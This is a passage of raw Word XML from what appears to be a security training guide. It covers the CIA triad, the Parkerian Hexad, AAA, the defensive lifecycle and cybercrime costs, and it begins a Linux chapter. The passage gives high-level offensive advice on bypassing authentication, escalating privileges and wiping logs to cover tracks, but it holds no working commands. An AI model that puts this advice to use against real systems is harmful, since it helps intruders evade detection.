            <w:tcW w:type="dxa" w:w="2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Encryption, access controls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Integrity</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Data has not been tampered with</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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SQL injection, man-in-the-middle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Hashing, digital signatures, checksums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Availability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Systems are accessible when needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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DDoS attack, ransomware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Redundancy, backups, rate limiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When assessing any target, ask yourself: 'Can I break Confidentiality? Can I break Integrity? Can I break Availability?' If yes to any of these, you have found a vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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E65100" w:sz="4"/>
              <w:left w:val="single" w:color="E65100" w:sz="4"/>
              <w:bottom w:val="single" w:color="E65100" w:sz="4"/>
              <w:right w:val="single" w:color="E65100" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E65100" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">IMPORTANT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="E65100" w:sz="4"/>
              <w:left w:val="single" w:color="E65100" w:sz="4"/>
              <w:bottom w:val="single" w:color="E65100" w:sz="4"/>
              <w:right w:val="single" w:color="E65100" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF3E0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Authenticity is NOT part of the CIA triad. It belongs to expanded models like the Parkerian Hexad (CIA + Authenticity + Possession + Utility). This is a common exam trap.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 The Parkerian Hexad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The CIA Triad is foundational but limited. Dr. Donn Parker expanded it to six properties:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confidentiality: Data is only accessible to authorized parties</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Integrity: Data is accurate and has not been altered</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Availability: Systems and data are accessible when needed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Authenticity: Data and identities are genuine (not spoofed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Possession/Control: The custodian of information maintains control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Utility: Information is in a form that is useful</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 The AAA Framework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication, Authorization, and Accounting form the backbone of access control:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication: Proving who you are (password, biometric, certificate, token)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization: What you're allowed to do (permissions, roles, ACLs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Accounting: Logging what you did (audit trails, SIEM logs, forensic evidence)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In offensive security, AAA is often the first thing you target. Bypass authentication, escalate authorization, and cover your tracks in accounting logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 The Defensive Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Defenders don't just react - they operate a continuous lifecycle of security improvement:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Key Activities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Prevention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Stop attacks before they happen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Patching, hardening, firewalls, user training</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Detection</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Identify ongoing or past attacks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IDS/IPS, SIEM, log analysis, baselining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Analysis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Understand what happened and how</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Forensics, incident investigation, timeline reconstruction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Mitigation</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Apply targeted fixes and patches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Patching CVEs, closing backdoors, isolating systems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Maintenance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Ongoing security posture upkeep</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Continuous monitoring, policy updates, red team testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation is specifically where you identify and categorize intrusion patterns then apply targeted fixes. This is distinct from Detection (finding the problem) and Prevention (stopping it from happening in the first place).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 Cost of Cybercrime to Society</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cybercrime has real costs. Security professionals need to understand these to communicate risk to stakeholders:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Direct Loss: Immediate tangible damage - stolen money, destroyed data, equipment damage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Indirect Loss: Psychological harm, reputational damage, loss of customer trust</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Consequence Cost: Ripple effects - regulatory fines, legal costs, business disruption</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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E65100" w:sz="4"/>
              <w:left w:val="single" w:color="E65100" w:sz="4"/>
              <w:bottom w:val="single" w:color="E65100" w:sz="4"/>
              <w:right w:val="single" w:color="E65100" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E65100" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">NOTE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="E65100" w:sz="4"/>
              <w:left w:val="single" w:color="E65100" w:sz="4"/>
              <w:bottom w:val="single" w:color="E65100" w:sz="4"/>
              <w:right w:val="single" w:color="E65100" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF3E0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Defense Cost is NOT part of 'cost to society' - it is an expenditure by organizations protecting themselves, not a consequence of the attack itself.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F8A9A"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">PART TWO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">LINUX FOR SECURITY PROFESSIONALS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F8A9A" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="480" w:after="160"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 4: Linux Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux is the primary operating system for cybersecurity work. Kali Linux, Parrot OS, and BlackArch are all built on Linux. Before you run any tools, you need to be comfortable with the command line.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 The Linux File System</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unlike Windows with its drive letters (C:\, D:\), Linux has a single unified file tree starting at / (root):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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Directory</w:t>
            </w:r>
          </w:p>
        </w:tc>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Contents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Security Relevance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Root of the file system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If compromised, everything is compromised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/etc</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System configuration files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Contains passwords, configs, cron jobs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/var/log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and application logs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Evidence of attacks; target for log wiping</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/home/user</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User home directories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Personal files, SSH keys, browser history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/root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Root user's home directory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High-value target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/tmp</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Temporary files (world-writable)</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Attackers often drop payloads here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/proc</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Virtual filesystem (kernel info)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Memory and process information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/usr/bin</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User program binaries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Common tools live here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/usr/share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Shared application data</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Wordlists, NSE scripts, payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 Essential Linux Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">These are the commands you will use every single day:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigation and File Management:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pwd                         # Print working directory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la                       # List all files with details (including hidden)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /etc                      # Change directory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir -p /opt/lab/targets   # Create directory tree</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
